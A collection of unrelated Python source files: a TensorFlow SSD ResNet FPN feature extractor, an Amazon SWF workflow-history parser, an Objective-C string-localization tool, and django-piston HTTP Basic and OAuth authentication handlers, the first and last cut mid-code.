            [(key, image_features[key]) for key in feature_block_list],
            depth=depth_fn(self._additional_layer_depth))
        feature_maps = []
        for level in range(self._fpn_min_level, base_fpn_max_level + 1):
          feature_maps.append(
              fpn_features['top_down_block{}'.format(level - 1)])
        last_feature_map = fpn_features['top_down_block{}'.format(
            base_fpn_max_level - 1)]
        # Construct coarse features
        for i in range(base_fpn_max_level, self._fpn_max_level):
          last_feature_map = slim.conv2d(
              last_feature_map,
              num_outputs=depth_fn(self._additional_layer_depth),
              kernel_size=[3, 3],
              stride=2,
              padding='SAME',
              scope='bottom_up_block{}'.format(i))
          feature_maps.append(last_feature_map)
    return feature_maps
class SSDResnet50V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
  """SSD FPN feature extractor built on a Resnet50 v1 backbone."""

  def __init__(self,
               is_training,
               depth_multiplier,
               min_depth,
               pad_to_multiple,
               conv_hyperparams_fn,
               fpn_min_level=3,
               fpn_max_level=7,
               additional_layer_depth=256,
               reuse_weights=None,
               use_explicit_padding=False,
               use_depthwise=False,
               override_base_feature_extractor_hyperparams=False):
    """Builds the Resnet50 v1 FPN feature extractor.

    Args:
      is_training: whether the network is in training mode.
      depth_multiplier: float depth multiplier for feature extractor.
      min_depth: minimum feature extractor depth.
      pad_to_multiple: the nearest multiple to zero pad the input height and
        width dimensions to.
      conv_hyperparams_fn: a function constructing a tf slim arg_scope for the
        conv2d and separable_conv2d ops added on top of the backbone.
      fpn_min_level: the minimum level in feature pyramid networks.
      fpn_max_level: the maximum level in feature pyramid networks.
      additional_layer_depth: additional feature map layer channel depth.
      reuse_weights: whether to reuse variables. Default is None.
      use_explicit_padding: whether to use explicit padding when extracting
        features. Default is False. UNUSED currently.
      use_depthwise: whether to use depthwise convolutions. UNUSED currently.
      override_base_feature_extractor_hyperparams: whether to override
        hyperparameters of the backbone with the ones from
        `conv_hyperparams_fn`.
    """
    # Delegate to the shared extractor with the resnet_v1_50 backbone.
    super(SSDResnet50V1FpnFeatureExtractor, self).__init__(
        is_training=is_training,
        depth_multiplier=depth_multiplier,
        min_depth=min_depth,
        pad_to_multiple=pad_to_multiple,
        conv_hyperparams_fn=conv_hyperparams_fn,
        resnet_base_fn=resnet_v1.resnet_v1_50,
        resnet_scope_name='resnet_v1_50',
        fpn_scope_name='fpn',
        fpn_min_level=fpn_min_level,
        fpn_max_level=fpn_max_level,
        additional_layer_depth=additional_layer_depth,
        reuse_weights=reuse_weights,
        use_explicit_padding=use_explicit_padding,
        use_depthwise=use_depthwise,
        override_base_feature_extractor_hyperparams=(
            override_base_feature_extractor_hyperparams))
class SSDResnet101V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
  """SSD FPN feature extractor built on a Resnet101 v1 backbone."""

  def __init__(self,
               is_training,
               depth_multiplier,
               min_depth,
               pad_to_multiple,
               conv_hyperparams_fn,
               fpn_min_level=3,
               fpn_max_level=7,
               additional_layer_depth=256,
               reuse_weights=None,
               use_explicit_padding=False,
               use_depthwise=False,
               override_base_feature_extractor_hyperparams=False):
    """Builds the Resnet101 v1 FPN feature extractor.

    Args:
      is_training: whether the network is in training mode.
      depth_multiplier: float depth multiplier for feature extractor.
      min_depth: minimum feature extractor depth.
      pad_to_multiple: the nearest multiple to zero pad the input height and
        width dimensions to.
      conv_hyperparams_fn: a function constructing a tf slim arg_scope for the
        conv2d and separable_conv2d ops added on top of the backbone.
      fpn_min_level: the minimum level in feature pyramid networks.
      fpn_max_level: the maximum level in feature pyramid networks.
      additional_layer_depth: additional feature map layer channel depth.
      reuse_weights: whether to reuse variables. Default is None.
      use_explicit_padding: whether to use explicit padding when extracting
        features. Default is False. UNUSED currently.
      use_depthwise: whether to use depthwise convolutions. UNUSED currently.
      override_base_feature_extractor_hyperparams: whether to override
        hyperparameters of the backbone with the ones from
        `conv_hyperparams_fn`.
    """
    # Delegate to the shared extractor with the resnet_v1_101 backbone.
    super(SSDResnet101V1FpnFeatureExtractor, self).__init__(
        is_training=is_training,
        depth_multiplier=depth_multiplier,
        min_depth=min_depth,
        pad_to_multiple=pad_to_multiple,
        conv_hyperparams_fn=conv_hyperparams_fn,
        resnet_base_fn=resnet_v1.resnet_v1_101,
        resnet_scope_name='resnet_v1_101',
        fpn_scope_name='fpn',
        fpn_min_level=fpn_min_level,
        fpn_max_level=fpn_max_level,
        additional_layer_depth=additional_layer_depth,
        reuse_weights=reuse_weights,
        use_explicit_padding=use_explicit_padding,
        use_depthwise=use_depthwise,
        override_base_feature_extractor_hyperparams=(
            override_base_feature_extractor_hyperparams))
class SSDResnet152V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
  """SSD FPN feature extractor built on a Resnet152 v1 backbone."""

  def __init__(self,
               is_training,
               depth_multiplier,
               min_depth,
               pad_to_multiple,
               conv_hyperparams_fn,
               fpn_min_level=3,
               fpn_max_level=7,
               additional_layer_depth=256,
               reuse_weights=None,
               use_explicit_padding=False,
               use_depthwise=False,
               override_base_feature_extractor_hyperparams=False):
    """Builds the Resnet152 v1 FPN feature extractor.

    Args:
      is_training: whether the network is in training mode.
      depth_multiplier: float depth multiplier for feature extractor.
      min_depth: minimum feature extractor depth.
      pad_to_multiple: the nearest multiple to zero pad the input height and
        width dimensions to.
      conv_hyperparams_fn: a function constructing a tf slim arg_scope for the
        conv2d and separable_conv2d ops added on top of the backbone.
      fpn_min_level: the minimum level in feature pyramid networks.
      fpn_max_level: the maximum level in feature pyramid networks.
      additional_layer_depth: additional feature map layer channel depth.
      reuse_weights: whether to reuse variables. Default is None.
      use_explicit_padding: whether to use explicit padding when extracting
        features. Default is False. UNUSED currently.
      use_depthwise: whether to use depthwise convolutions. UNUSED currently.
      override_base_feature_extractor_hyperparams: whether to override
        hyperparameters of the backbone with the ones from
        `conv_hyperparams_fn`.
    """
    # Delegate to the shared extractor with the resnet_v1_152 backbone.
    super(SSDResnet152V1FpnFeatureExtractor, self).__init__(
        is_training=is_training,
        depth_multiplier=depth_multiplier,
        min_depth=min_depth,
        pad_to_multiple=pad_to_multiple,
        conv_hyperparams_fn=conv_hyperparams_fn,
        resnet_base_fn=resnet_v1.resnet_v1_152,
        resnet_scope_name='resnet_v1_152',
        fpn_scope_name='fpn',
        fpn_min_level=fpn_min_level,
        fpn_max_level=fpn_max_level,
        additional_layer_depth=additional_layer_depth,
        reuse_weights=reuse_weights,
        use_explicit_padding=use_explicit_padding,
        use_depthwise=use_depthwise,
        override_base_feature_extractor_hyperparams=(
            override_base_feature_extractor_hyperparams))
| |
import json
from datetime import datetime
from pyworkflow.process import Process, ProcessCompleted, ProcessCanceled, ProcessTimedOut
from pyworkflow.events import Event, DecisionStartedEvent, DecisionEvent, ActivityEvent, ActivityStartedEvent, SignalEvent, ChildProcessEvent, TimerEvent, ProcessStartedEvent
from pyworkflow.signal import Signal
from pyworkflow.activity import ActivityCompleted, ActivityCanceled, ActivityFailed, ActivityTimedOut, ActivityExecution
from pyworkflow.decision import ScheduleActivity, StartChildProcess, Timer
class AmazonSWFProcess(Process):
    """Reconstructs a pyworkflow ``Process`` (id, workflow, input, history)
    from the raw Amazon SWF execution/history dictionaries returned by the
    SWF API.

    NOTE(review): this module targets Python 2 only -- ``filter(...)[0]``
    relies on filter() returning a list, and ``from_description`` uses a
    tuple-unpacking lambda, which is a syntax error under Python 3.
    """
    @classmethod
    def _related_event(cls, related, event_id):
        # Look up the event with the given eventId in the related-events
        # list; raises IndexError if it is absent.
        return filter(lambda x: x['eventId'] == event_id, related)[0]
    @classmethod
    def _attributes(cls, event):
        # SWF stores per-event data under '<lowerCamelEventType>EventAttributes'.
        event_type = event['eventType']
        return event.get(event_type[0].lower() + event_type[1:] + 'EventAttributes', {})
    @classmethod
    def _decision_event(cls, event, related):
        """Map a decision-result event to (logical_order, DecisionEvent)."""
        event_id = event['eventId']
        event_dt = datetime.fromtimestamp(event['eventTimestamp'])
        event_type = event['eventType']
        attributes = cls._attributes(event)
        # Walk back to the decision task that produced this event so it is
        # ordered at the decision's *start*, not at its effect.
        completed_event = cls._related_event(related, attributes['decisionTaskCompletedEventId'])
        started_event_id = completed_event['decisionTaskCompletedEventAttributes']['startedEventId']
        inp = json.loads(attributes['input']) if attributes.get('input', None) else None
        # Only the three event types routed here by event_from_description are
        # handled; any other type would leave `decision` unbound (NameError).
        if event_type == 'ActivityTaskScheduled':
            activity_id = attributes['activityId']
            activity = attributes['activityType']['name']
            decision = ScheduleActivity(activity=activity, id=activity_id, input=inp)
        elif event_type == 'StartChildWorkflowExecutionInitiated':
            process = Process(workflow=attributes['workflowType']['name'], input=inp, tags=attributes['tagList'])
            decision = StartChildProcess(process=process)
        elif event_type == 'TimerStarted':
            decision = Timer(delay=int(attributes['startToFireTimeout']), data=json.loads(attributes['control']))
        # logical order is start of decision, everything after needs to be considered in next decision
        return (started_event_id, DecisionEvent(datetime=event_dt, decision=decision))
    @classmethod
    def _activity_event(cls, event, related):
        """Map an activity lifecycle event to (logical_order, event)."""
        event_id = event['eventId']
        event_dt = datetime.fromtimestamp(event['eventTimestamp'])
        event_type = event['eventType']
        attributes = cls._attributes(event)
        def event_with_result(result):
            # Recover the original ActivityExecution from the scheduling event.
            scheduled_by = cls._related_event(related, attributes['scheduledEventId'])
            attrs = scheduled_by.get('activityTaskScheduledEventAttributes', None)
            try:
                inp = json.loads(attrs['input']) if attrs.get('input', None) else None
            except:
                # Input was not JSON; fall back to the raw string.
                inp = attrs.get('input', None)
            kwargs = {
                # NOTE(review): key is 'date' here but 'datetime' everywhere
                # else -- confirm ActivityEvent/ActivityStartedEvent accept it.
                'date': event_dt,
                'activity_execution': ActivityExecution(attrs['activityType']['name'], attrs['activityId'], inp),
            }
            event_cls = ActivityEvent if result else ActivityStartedEvent
            if result:
                kwargs['result'] = result
            return (event_id, event_cls(**kwargs))
        if event_type == 'ActivityTaskStarted':
            return event_with_result(None)
        elif event_type == 'ActivityTaskCompleted':
            result = json.loads(attributes['result']) if 'result' in attributes.keys() else None
            return event_with_result(ActivityCompleted(result=result))
        elif event_type == 'ActivityTaskFailed':
            reason = attributes.get('reason', None)
            details = attributes.get('details', None)
            res = ActivityFailed(reason=reason, details=details)
            return event_with_result(res)
        elif event_type == 'ActivityTaskCanceled':
            details = attributes.get('details', None)
            return event_with_result(ActivityCanceled(details=details))
        elif event_type == 'ActivityTaskTimedOut':
            details = attributes.get('details', None)
            return event_with_result(ActivityTimedOut(details=details))
    @classmethod
    def _child_process_event(cls, event, related):
        """Map a child-workflow terminal event to (logical_order, ChildProcessEvent)."""
        event_id = event['eventId']
        event_dt = datetime.fromtimestamp(event['eventTimestamp'])
        event_type = event['eventType']
        attributes = cls._attributes(event)
        # The initiating event carries the workflow name and tags.
        initiated_by = cls._related_event(related, attributes['initiatedEventId'])
        initiated_attr = initiated_by['startChildWorkflowExecutionInitiatedEventAttributes']
        pid = cls.pid_from_description(attributes['workflowExecution'])
        kwargs = {
            'datetime': event_dt,
            'workflow': initiated_attr['workflowType']['name'],
            'tags': initiated_attr['tagList']
        }
        if event_type == 'ChildWorkflowExecutionCompleted':
            json_res = json.loads(attributes['result']) if 'result' in attributes.keys() else None
            result = ProcessCompleted(result=json_res)
        elif event_type == 'ChildWorkflowExecutionCanceled':
            details = attributes.get('details', None)
            result = ProcessCanceled(details=details)
        elif event_type == 'ChildWorkflowExecutionTimedOut':
            result = ProcessTimedOut()
        else:
            # Other ChildWorkflowExecution* events are not part of history.
            return None
        return (event_id, ChildProcessEvent(pid, result, **kwargs))
    @classmethod
    def _signal_event(cls, event, related):
        """Map WorkflowExecutionSignaled to (logical_order, SignalEvent)."""
        event_id = event['eventId']
        event_dt = datetime.fromtimestamp(event['eventTimestamp'])
        event_type = event['eventType']
        attributes = cls._attributes(event)
        try:
            data = json.loads(attributes['input']) if 'input' in attributes.keys() else None
        except:
            # Non-JSON payload: pass it through untouched.
            data = attributes.get('input', None)
        name = attributes['signalName']
        return (event_id, SignalEvent(datetime=event_dt, signal=Signal(name=name, data=data)))
    @classmethod
    def _timer_event(cls, event, related):
        """Map TimerFired to (logical_order, TimerEvent)."""
        event_id = event['eventId']
        event_dt = datetime.fromtimestamp(event['eventTimestamp'])
        attributes = cls._attributes(event)
        # Rebuild the Timer from the matching TimerStarted event.
        started_by = filter(lambda x: x['eventId'] == attributes['startedEventId'], related)[0]
        started_attrs = started_by['timerStartedEventAttributes']
        timer = Timer(delay=int(started_attrs['startToFireTimeout']), data=json.loads(started_attrs['control']))
        return (event_id, TimerEvent(datetime=event_dt, timer=timer))
    @classmethod
    def event_from_description(cls, description, related=[]):
        """Dispatch one SWF history-event dict to the matching builder.

        Returns (logical_order, Event), or None for event types that do not
        appear in the process history. The mutable default for ``related``
        is safe because it is never mutated.
        """
        event_type = description['eventType']
        if event_type == 'WorkflowExecutionStarted':
            dt = datetime.fromtimestamp(description['eventTimestamp'])
            return (description['eventId'], ProcessStartedEvent(datetime=dt))
        elif event_type == 'DecisionTaskStarted':
            dt = datetime.fromtimestamp(description['eventTimestamp'])
            return (description['eventId'], DecisionStartedEvent(datetime=dt))
        elif event_type in ['ActivityTaskScheduled','StartChildWorkflowExecutionInitiated','TimerStarted']:
            return cls._decision_event(description, related)
        elif event_type.startswith('ActivityTask') and not event_type == 'ActivityTaskScheduled':
            return cls._activity_event(description, related)
        elif event_type == 'WorkflowExecutionSignaled':
            return cls._signal_event(description, related)
        elif event_type.startswith('ChildWorkflowExecution'):
            return cls._child_process_event(description, related)
        elif event_type == 'TimerFired':
            return cls._timer_event(description, related)
        else:
            return None
    @classmethod
    def from_description(cls, description):
        """Build an AmazonSWFProcess from an SWF execution description.

        Accepts either a decision-task response ('workflowExecution') or an
        execution-info dict ('execution'); returns None if neither is present.
        """
        execution_desc = description.get('workflowExecution', None) or description.get('execution', None)
        if not execution_desc:
            return None
        pid = cls.pid_from_description(execution_desc)
        workflow = description.get('workflowType', {}).get('name', None)
        tags = description.get('tagList', [])
        events = []
        event_descriptions = description.get('events', [])
        for event_description in event_descriptions:
            start_attrs = event_description.get('workflowExecutionStartedEventAttributes', None)
            if start_attrs:
                try:
                    input = json.loads(start_attrs['input'])
                except:
                    # Missing or non-JSON input: keep the raw value (or None).
                    input = start_attrs.get('input', None)
                tags = start_attrs['tagList']
                parent = None
                parent_wfe = start_attrs.get('parentWorkflowExecution', None)
                if parent_wfe:
                    parent = cls.pid_from_description(parent_wfe)
            event = cls.event_from_description(event_description, related=event_descriptions)
            if event:
                events.append(event)
        # events is [(order, event)]. history is events sorted by logical order
        # NOTE(review): `input` and `parent` are only bound inside the
        # start_attrs branch above; a history without a
        # WorkflowExecutionStarted event raises NameError below -- confirm
        # SWF always includes it.
        history = [event for (log_order, event) in sorted(events, key=lambda (log_order, event): int(log_order))]
        return AmazonSWFProcess(id=pid, workflow=workflow, input=input, tags=tags, history=history, parent=parent)
    @classmethod
    def pid_from_description(cls, description):
        # SWF identifies an execution by (workflowId, runId); join them into
        # a single process-id string.
        return '%s:%s' % (description['workflowId'], description['runId'])
| |
#import rlcompleter
import gnureadline as readline
import argparse
import re
import sys
import slugify
import tokenize
import colored
import glob
import shutil
import codecs
# Code template inserted in place of each replaced @"..." literal.
TEMPLATE =\
"""
NSLocalizedStringWithDefaultValue(@"{slug}",
    {table}, {bundle},
    @"{value}",
    @"{comment}"
)"""
# Marker prefix that requests automatic replacement of the following string.
DEFAULT_AUTOREPLACE_PREFIX = "__LOCALIZE"
# Placeholder substituted for printf-style format specifiers in slugs.
DEFAULT_SLUG_FORMATTING_ARGUMENT_REPLACE = "[]"
DEFAULT_LOCALIZATIONSTABLE = "kDefaultLocalizationsTable"
DEFAULT_BUNDLE = "kClassBundle"
# BUG FIX: the original pattern r'[^-a-z0-9[]]+' closes the character class at
# the first ']', leaving a dangling literal ']+' that almost never matches.
# '[' and ']' must be escaped inside the class so slugs may keep the "[]"
# placeholder while every other disallowed character is stripped.
slugify.ALLOWED_CHARS_PATTERN = re.compile(r'[^-a-z0-9\[\]]+')
def context_buf_readlines(infile, A=10, B=6):
    """Iterate over the lines of ``infile`` together with context.

    Yields ``(before, line, after, index)`` tuples where ``before`` holds up
    to A+1 preceding lines, ``after`` holds up to B-1 following lines, and
    ``index`` is the 0-based line number of ``line``.
    """
    before = []
    pending = []
    index = 0
    for raw in infile.readlines():
        pending.append(raw)
        # Delay emission until B lines are buffered so `after` has context.
        if len(pending) < B:
            continue
        yield before, pending[0], pending[1:], index
        index += 1
        before = before[-A:] + pending[:1]
        pending = pending[1:]
    # Drain the tail: emit the remaining lines with shrinking after-context.
    while pending:
        yield before, pending[0], pending[1:], index
        index += 1
        before = before[-A:] + pending[:1]
        pending = pending[1:]
class NoMatchException(Exception):
    """Control-flow exception: the current line has no replaceable string."""
    pass
class ReplaceAction(Exception):
    """Control-flow exception: replace the string matched on this line."""
    pass
# Baseline settings for parse(); mirrors parse()'s keyword defaults.
default_config = dict(table = DEFAULT_LOCALIZATIONSTABLE,
                      bundle = DEFAULT_BUNDLE,
                      autoreplace_prefix = DEFAULT_AUTOREPLACE_PREFIX,
                      ask_all = False,
                      comments = False)
def parse(filename, infile, outfile,
          ask_all = False,
          comments = False,
          table = DEFAULT_LOCALIZATIONSTABLE,
          bundle = DEFAULT_BUNDLE,
          autoreplace_prefix = DEFAULT_AUTOREPLACE_PREFIX):
    """Scan ``infile`` for Objective-C ``@"..."`` literals and write a
    localized version of the content to ``outfile``.

    filename            -- display name used in interactive prompts
    infile              -- readable file-like object with the source
    outfile             -- writable file-like object for the result
    ask_all             -- interactively confirm every candidate string
    comments            -- interactively edit slug and translator comment
    table, bundle       -- argument strings spliced into TEMPLATE
    autoreplace_prefix  -- strings preceded by this marker are replaced
                           automatically (the marker itself is stripped)

    Control flow is exception based: NoMatchException means "copy the line
    through unchanged", ReplaceAction means "localize this string".
    Raises KeyboardInterrupt to signal the caller after the user quits.
    """
    interactive = ask_all or comments
    # Groups: (prefix)@"(literal)"(postfix) -- first string on the line.
    string_re = re.compile(r'(.*?)@"([^"]+)"(.*)')
    # Lines already wrapped in an NSLocalized...String( call.
    prefix_re = re.compile(r"NSLocalized[a-zA-Z]String\(");
    # printf-style format specifiers inside the literal.
    fmt_re = re.compile(r"%[-0-9\.]*[l]?[difes\@]")
    def slug_from_string(sel):
        # Slugify the literal, replacing format specifiers with "[]".
        items = fmt_re.split(sel)
        newitems = map(lambda item:slugify.slugify(item), items)
        delimiter = "-"+DEFAULT_SLUG_FORMATTING_ARGUMENT_REPLACE +"-"
        slug = delimiter.join(filter(lambda x:len(x), newitems))
        return slug
    w = sys.stdout.write
    fg = colored.fg
    attr = colored.attr
    quit_after = False
    linenum = 0
    replace_autoprefix = True
    #for line in infile.readlines():
    for prebuf, line, postbuf, linenum in context_buf_readlines(infile):
        try:
            match = string_re.match(line)
            if not match:
                raise NoMatchException
            prefix = match.group(1)
            sel = match.group(2)
            postfix = match.group(3)
            def _print_preamble():
                # Print the match with surrounding context, colorized.
                header = "%s (%d):" % (filename, linenum)
                # NOTE(review): there is no comma after '\n' two lines below,
                # so '\n' and the following " " concatenate into "\n " --
                # possibly intended, possibly a missing comma.
                data = [
                    fg(2), attr(1), header, "_" * (60 - len(header) -5 ), attr(0), "\n",
                    " ", " ".join(prebuf),
                    fg(3), "> ", prefix, fg(4), '@"', fg(2), attr(1), sel, fg(4), '"', attr(0), '\n'
                    " ", " ".join(postbuf)
                ]
                w("".join(data))
            print_preamble = _print_preamble
            if prefix_re.search(prefix):
                # Already localized: copy through.
                raise NoMatchException
            if prefix[-1] in "[":
                raise NoMatchException
            try:
                if replace_autoprefix and prefix.endswith(autoreplace_prefix):
                    # Auto mode: strip the marker and replace unconditionally.
                    prefix = prefix[:-len(autoreplace_prefix)]
                    raise ReplaceAction
                if ask_all:
                    print_preamble()
                    # Avoid printing the preamble twice for this match.
                    print_preamble = lambda :None
                    answer = raw_input(colored.fg(1) + colored.attr(1) + "Replace String? [N/y]" + colored.attr(0))
                    if len(answer) > 0:
                        if answer in "Yy":
                            raise ReplaceAction
                        elif answer in "qQ":
                            # Quit: finish the file non-interactively.
                            ask_all = False
                            comments = False
                            quit_after = True
                            replace_autoprefix = False
            except ReplaceAction:
                slug = slug_from_string(sel)
                cmt = sel
                try:
                    if comments:
                        print_preamble()
                        # Pre-fill the readline prompt with the generated slug.
                        def hook():
                            readline.insert_text(slug)
                            readline.redisplay()
                        readline.set_pre_input_hook(hook)
                        if len(slug)>30:
                            w( fg(1) + attr(1) + ( "ID for translation:" ) + attr(0))
                            w("\n" + fg(1) )
                            newslug = raw_input("> ")
                            w(attr(0))
                        else:
                            w("\n" + fg(1) + attr(1))
                            newslug = raw_input( "ID for translation: ")
                            w(attr(0))
                        if newslug:
                            slug = newslug
                        # Pre-fill the comment prompt with the original string.
                        def hook():
                            readline.insert_text(sel)
                            readline.redisplay()
                        readline.set_pre_input_hook(hook)
                        cmt = raw_input(colored.fg(1) + colored.attr(1) + "Comment for translator: " + colored.attr(0))
                        if not cmt:
                            cmt = sel
                        readline.set_pre_input_hook()
                except KeyboardInterrupt:
                    w("\n")
                    raise
                else:
                    rep = TEMPLATE.format(slug=slug, value = sel, comment = cmt, bundle = bundle, table = table )
                    if comments or interactive:
                        w( "".join(prebuf[-3:] +
                            [
                                prefix, fg(4), rep, attr(0), postfix, "\n"
                            ] + postbuf[0:3]
                        ))
                    outfile.write("".join([prefix, rep, postfix, "\n"]))
                    continue
            except KeyboardInterrupt:
                raise
            else:
                # Neither auto-replaced nor confirmed: copy through.
                raise NoMatchException
        except KeyboardInterrupt:
            # Ctrl-C: stop interacting, flush this line, finish the file.
            ask_all = False
            comments = False
            interactive = False
            replace_autoprefix = False
            if line:
                outfile.writelines([line])
            quit_after = True
        except NoMatchException:
            outfile.writelines([line])
        if quit_after:
            raise KeyboardInterrupt
def main():
    """Command-line entry point for localize_m.

    Returns 0 on success, -1 on bad usage or user interrupt.
    """
    epilog = """Localize_m has two modes:
    1. Interactively parse your file, and ask for each string whether it
    should be localized ( `--ask-all` option).
    2. Automatically parse your file and replace each `@"..."` string prefixed
    with `__LOCALIZE` with a localized version. This mode can run in a fully
    automated fashion or, when you use the `-c` option, `localize_m` will
    ask you to edit the slug and to provide a comment for the translator.
    Localize_m inserts the following code for each `@"..."` string you
    choose to replace:
    NSLocalizedStringWithDefaultValue(<slug>,
    kDefaultLocalizationTable, kClassBundle,
    @"...", @"...")
    """
    parser = argparse.ArgumentParser(description = "Localize_m helps with localizing your objc `.m` files",
                                     epilog = epilog,
                                     formatter_class = argparse.RawDescriptionHelpFormatter,
                                     )
    input_group = parser.add_argument_group("Input")
    input_group.add_argument('-p', '--path', type = str, help = "localize all .m files in path")
    input_group.add_argument('infile', metavar = 'infile', nargs = '?',
                             type=str,
                             help='Input .m file')
    input_group.add_argument('-o','--outfile', metavar = 'outfile', nargs = '?',
                             type=str,
                             default=None,
                             help='Output file, otherwise stdout')
    input_group.add_argument("-a", "--ask-all", help = "ask for all strings (interactive))", default = False, action = "store_true")
    input_group.add_argument("-c", "--comments", help = "ask for comments and ids (interactive)", default = False, action = "store_true")
    input_group.add_argument("--inplace", help = "localize file in-place", default = False, action = "store_true")
    custom = parser.add_argument_group("Customization")
    custom.add_argument("--table", type = str, help = "custom localizations table argument", default = DEFAULT_LOCALIZATIONSTABLE)
    custom.add_argument("--bundle", type = str, help = "custom NSBundle argument", default = DEFAULT_BUNDLE)
    custom.add_argument("--replace", type = str, help = "Auto localization prefix string", default = DEFAULT_AUTOREPLACE_PREFIX)
    args = parser.parse_args()
    if not args.infile and not args.path:
        parser.print_help()
        return -1
    if args.ask_all:
        # Interactive confirmation implies interactive slug/comment editing.
        args.comments = True
    config = dict(table = args.table,
                  bundle = args.bundle,
                  autoreplace_prefix = args.replace,
                  ask_all = args.ask_all,
                  comments = args.comments
                  )
    if args.inplace:
        from io import StringIO
        # BUG FIX: this branch referenced the undefined name `infile`, called
        # .close() on the `args.infile` string, misspelled `codecs` as
        # `codec`, and dropped the table/bundle/prefix settings. Read the
        # whole file into memory first so it can be rewritten in place.
        fp = codecs.open(args.infile, "r", encoding="utf-8")
        inbuf = StringIO(fp.read())
        fp.close()
        outfile = codecs.open(args.infile, "w", encoding="utf-8")
        try:
            parse(args.infile, inbuf, outfile, **config)
        except KeyboardInterrupt:
            return -1
    else:
        try:
            if args.infile:
                if not args.outfile:
                    outbuf = sys.stdout
                    if args.ask_all or args.comments:
                        # print() form works on both Python 2 and 3.
                        print("Output to stdout is only supported in non-interactive mode")
                        return -1
                else:
                    outbuf = codecs.open(args.outfile, "w", encoding="utf-8")
                parse(args.infile, codecs.open(args.infile,"r", encoding="utf-8"), outbuf, **config)
            elif args.path: # implies inplace
                from io import StringIO
                for fn in glob.glob(args.path + "/*.m"):
                    intext = StringIO(codecs.open(fn, encoding="utf-8",mode="r").read())
                    # BUG FIX: write back through codecs so non-ASCII output
                    # does not raise UnicodeEncodeError.
                    outfile = codecs.open(fn, "w", encoding="utf-8")
                    parse(fn, intext, outfile, **config)
        except KeyboardInterrupt:
            return -1
    return 0
| |
import binascii
import oauth
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.template import loader
from django.contrib.auth import authenticate
from django.conf import settings
from django.core.urlresolvers import get_callable
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import render_to_response
from django.template import RequestContext
from piston import forms
class NoAuthentication(object):
    """
    Authentication handler that grants access unconditionally.

    Because every request is considered authenticated, no `challenge`
    method is defined -- no authentication flow is ever initiated.
    """
    def is_authenticated(self, request):
        # Every request passes; `request` is intentionally ignored.
        return True
class HttpBasicAuthentication(object):
    """
    HTTP Basic authentication handler.

    Authentication handlers implement two methods:
     - `is_authenticated`: called to check authentication. Receives a
       `request` object; sets a `User` on `request.user` and returns a
       truthy value on success, otherwise returns False.
     - `challenge`: when `is_authenticated` returns False, the result of
       this method is returned -- here a 401 response carrying the
       `WWW-Authenticate` header for the configured realm.
    """
    def __init__(self, auth_func=authenticate, realm='API'):
        self.auth_func = auth_func
        self.realm = realm

    def is_authenticated(self, request):
        header = request.META.get('HTTP_AUTHORIZATION', None)
        if not header:
            return False
        try:
            scheme, payload = header.split(" ", 1)
            if scheme.lower() != 'basic':
                return False
            # Python 2 codec-based base64 decode of "user:password".
            decoded = payload.strip().decode('base64')
            username, password = decoded.split(':', 1)
        except (ValueError, binascii.Error):
            # Malformed header, bad base64, or missing ':' separator.
            return False
        user = self.auth_func(username=username, password=password)
        request.user = user or AnonymousUser()
        return not request.user in (False, None, AnonymousUser())

    def challenge(self):
        resp = HttpResponse("Authorization Required")
        resp['WWW-Authenticate'] = 'Basic realm="%s"' % self.realm
        resp.status_code = 401
        return resp
def load_data_store():
    '''Load data store for OAuth Consumers, Tokens, Nonces and Resources.

    Returns the class named by settings.OAUTH_DATA_STORE (defaulting to
    "piston.store.DataStore"); raises ImproperlyConfigured when the module
    or the attribute cannot be imported.
    '''
    path = getattr(settings, 'OAUTH_DATA_STORE', 'piston.store.DataStore')
    # stolen from django.contrib.auth.load_backend
    i = path.rfind('.')
    module, attr = path[:i], path[i+1:]
    try:
        # fromlist must be non-empty so the submodule itself is returned.
        mod = __import__(module, {}, {}, attr)
    except ImportError, e:
        raise ImproperlyConfigured, 'Error importing OAuth data store %s: "%s"' % (module, e)
    try:
        cls = getattr(mod, attr)
    except AttributeError:
        raise ImproperlyConfigured, 'Module %s does not define a "%s" OAuth data store' % (module, attr)
    return cls
# Resolve the configured OAuth data store class once, at import time.
oauth_datastore = load_data_store()
def initialize_server_request(request):
    """
    Build the (OAuthServer, OAuthRequest) pair for a Django request.

    Returns (None, oauth_request) when the request carries no usable
    OAuth parameters.
    """
    oauth_request = oauth.OAuthRequest.from_request(
        request.method, request.build_absolute_uri(),
        headers=request.META, parameters=dict(request.REQUEST.items()),
        query_string=request.environ.get('QUERY_STRING', ''))
    if not oauth_request:
        return None, oauth_request
    server = oauth.OAuthServer(oauth_datastore(oauth_request))
    # Accept both signature methods supported by the oauth library.
    server.add_signature_method(oauth.OAuthSignatureMethod_PLAINTEXT())
    server.add_signature_method(oauth.OAuthSignatureMethod_HMAC_SHA1())
    return server, oauth_request
def send_oauth_error(err=None):
    """
    Shortcut for sending an OAuth error response.

    Builds a 401 response whose body is the error message and whose
    headers carry the OAuth authenticate challenge for the realm.
    """
    # BUG FIX: the default err=None used to crash with AttributeError on
    # `err.message`; fall back to a generic message instead.
    message = err.message if err is not None else 'OAuth error'
    response = HttpResponse(message.encode('utf-8'))
    response.status_code = 401
    realm = 'OAuth'
    header = oauth.build_authenticate_header(realm=realm)
    # .items() instead of the Python-2-only .iteritems() -- works on both.
    for k, v in header.items():
        response[k] = v
    return response
def oauth_request_token(request):
    """Request-token endpoint: exchange a signed request for a request token."""
    oauth_server, oauth_request = initialize_server_request(request)
    if oauth_server is None:
        return INVALID_PARAMS_RESPONSE
    try:
        token = oauth_server.fetch_request_token(oauth_request)
        response = HttpResponse(token.to_string())
    except oauth.OAuthError, err:
        response = send_oauth_error(err)
    return response
def oauth_auth_view(request, token, callback, params):
    """Render the default token-authorization form.

    `params` is accepted for interface compatibility but unused here.
    """
    initial = {
        'oauth_token': token.key,
        'oauth_callback': callback,
    }
    form = forms.OAuthAuthenticationForm(initial=initial)
    return render_to_response('piston/authorize_token.html',
        { 'form': form }, RequestContext(request))
@login_required
def oauth_user_auth(request):
    """Token-authorization endpoint (login required).

    GET renders an authorization form (honoring an OAUTH_AUTH_VIEW
    override); POST authorizes the token for request.user and redirects to
    the callback, or delegates to OAUTH_CALLBACK_VIEW when the request
    supplied no callback URL.
    """
    oauth_server, oauth_request = initialize_server_request(request)
